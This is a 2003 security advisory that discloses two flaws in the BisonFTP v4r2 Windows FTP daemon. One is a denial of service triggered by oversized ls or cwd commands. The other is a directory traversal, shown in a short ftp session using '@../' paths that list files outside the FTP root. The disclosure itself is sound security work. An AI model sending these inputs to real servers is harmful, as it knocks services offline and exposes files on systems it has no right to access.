Mulitple vulnerabilities found in BisonFTP

[Immune Advisory <ja () immune dk>]

[immune advisory] Mulitple vulnerabilities found in BisonFTP
================================================================================
BisonFTP is a FTP daemon used on Microsoft Windows 9x/NT systems.


-[ DESCRIPTION ]----------------------------------------------------------------
I)  BisonFTP is vulnerable to a DoS attack by sending ftp commands with big
    data. By sending the ftp command ls or cwd with 4300 bytes or more,
    BisonFTP will start 100% CPU usage until the socket is closed by the client.

II) It's possible to trick BisonFTP into revealing confidiential information
    about files outside ftp root.

    ftp> ls @../
    227 Entering PASV Mode (10,10,10,10,4,126)
    150 Directory List Follows
    -rwxrwxrwx   1 user     group      739577 Feb 05  2002 BisonFTP42.exe
    226 Listing complete.
    ftp> mget @../Biso
    local: BisonFTP42.exe remote: BisonFTP42.exe
    227 Entering PASV Mode (10,10,10,10,4,128)
    550 File does not exist
    ftp>

    % Note that BisonFTP42.exe is NOT located in ftp root.


-[ AFFECTED VERSIONS ]----------------------------------------------------------
BisonFTP v4r2.
* Earlier versions are not tested.


-[ SOLUTION/WORKAROUND ]--------------------------------------------------------
It's not possible to get in contact with the people at http://www.bisonftp.com
anymore. I guess a new version will never be released.

Workaround, since there might not be a new version you probaly better to
install another FTP daemon.


-[ CREDIT ]---------------------------------------------------------------------
Bugs found:       15/jan 2003, by Jimmi Andersen
Vendor contacted: 11/feb 2003
Made public:      17/feb 2003
http://www.immune.dk | Immune - Angreb og forsvar af systemer